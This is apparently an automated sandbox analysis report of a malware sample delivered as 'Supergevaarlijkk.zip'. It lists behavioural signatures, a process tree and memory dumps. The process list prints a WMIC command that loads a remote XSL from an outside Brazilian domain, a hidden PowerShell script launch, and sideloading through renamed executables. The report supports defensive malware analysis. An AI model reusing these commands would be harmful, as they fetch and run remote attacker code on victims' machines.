Analysis

  • max time kernel: 122s
  • max time network: 126s
  • resource: win7v191014

General

  • Target: Supergevaarlijkk.zip
  • Sample: 191029-p1j1431a9n
  • SHA256: 6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Score
N/A

Malware Config

Signatures

  • Uses Volume Shadow Copy Service COM API 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Drops file in system dir 23 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • Loads dropped DLL 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs 18 IoCs
  • Uses Volume Shadow Copy WMI provider 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Discovering connected drives 3 TTPs 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Executes dropped EXE 3 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Discovering connected drives
    PID:1232
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in system dir
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    PID:1060
  • C:\Windows\system32\MsiExec.exe
    C:\Windows\system32\MsiExec.exe -Embedding B634A551DF859F86E9240F3227158634
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1972
  • C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1364
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-15615658111133415321640779294-713463533-2759988842134842951-1197704532-314222821"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1344
  • C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding 0E7631CBA027D971C91749B234541526
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    PID:1912
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
    1⤵
    • Uses Volume Shadow Copy Service COM API
    • Drops startup file
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in system dir
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Uses Task Scheduler COM API
    • Uses Volume Shadow Copy WMI provider
    PID:1192
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "18774686867520453695705469911966248280143184437110595509861908542373-1764949845"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2068
  • C:\Users\Admin\AppData\Local\Temp\lc8EF5.tmp
    "C:\Users\Admin\AppData\Local\Temp\lc8EF5.tmp"
    1⤵
    • Executes dropped EXE
    PID:2160
  • C:\Users\Admin\AppData\Roaming\poMNJa\nvsmartmaxapp.exe
    "C:\Users\Admin\AppData\Roaming\poMNJa\nvsmartmaxapp.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    • Executes dropped EXE
    PID:2404
  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    PID:2424
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {131BEACE-730A-44CC-B203-4B546B87E23F} S-1-5-21-1774239815-1814403401-2200974991-1000:JUEOVPOM\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2764
  • C:\Users\Admin\AppData\Roaming\poMNJa\gup.exe
    C:\Users\Admin\AppData\Roaming\poMNJa\gup.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    • Executes dropped EXE
    PID:2796
  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    1⤵
    • Loads dropped DLL
    PID:2832

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/1060-15-0x0000000002090000-0x0000000002094000-memory.dmp (Filesize: 16KB)
  • memory/1060-12-0x0000000001300000-0x0000000001304000-memory.dmp (Filesize: 16KB)
  • memory/1060-11-0x0000000001680000-0x0000000001684000-memory.dmp (Filesize: 16KB)
  • memory/1060-13-0x0000000002090000-0x0000000002094000-memory.dmp (Filesize: 16KB)
  • memory/1192-20-0x000000001C230000-0x000000001C234000-memory.dmp (Filesize: 16KB)
  • memory/1192-19-0x000000001C230000-0x000000001C234000-memory.dmp (Filesize: 16KB)
  • memory/1232-0-0x00000000040D0000-0x00000000040D4000-memory.dmp (Filesize: 16KB)
  • memory/1232-17-0x0000000002240000-0x0000000002244000-memory.dmp (Filesize: 16KB)
  • memory/1232-16-0x00000000040D0000-0x00000000040D4000-memory.dmp (Filesize: 16KB)
  • memory/2424-27-0x0000000003290000-0x00000000032A1000-memory.dmp (Filesize: 68KB)
  • memory/2424-28-0x00000000036A0000-0x00000000036B1000-memory.dmp (Filesize: 68KB)
  • memory/2424-24-0x00000000000C0000-0x00000000000C1000-memory.dmp (Filesize: 4KB)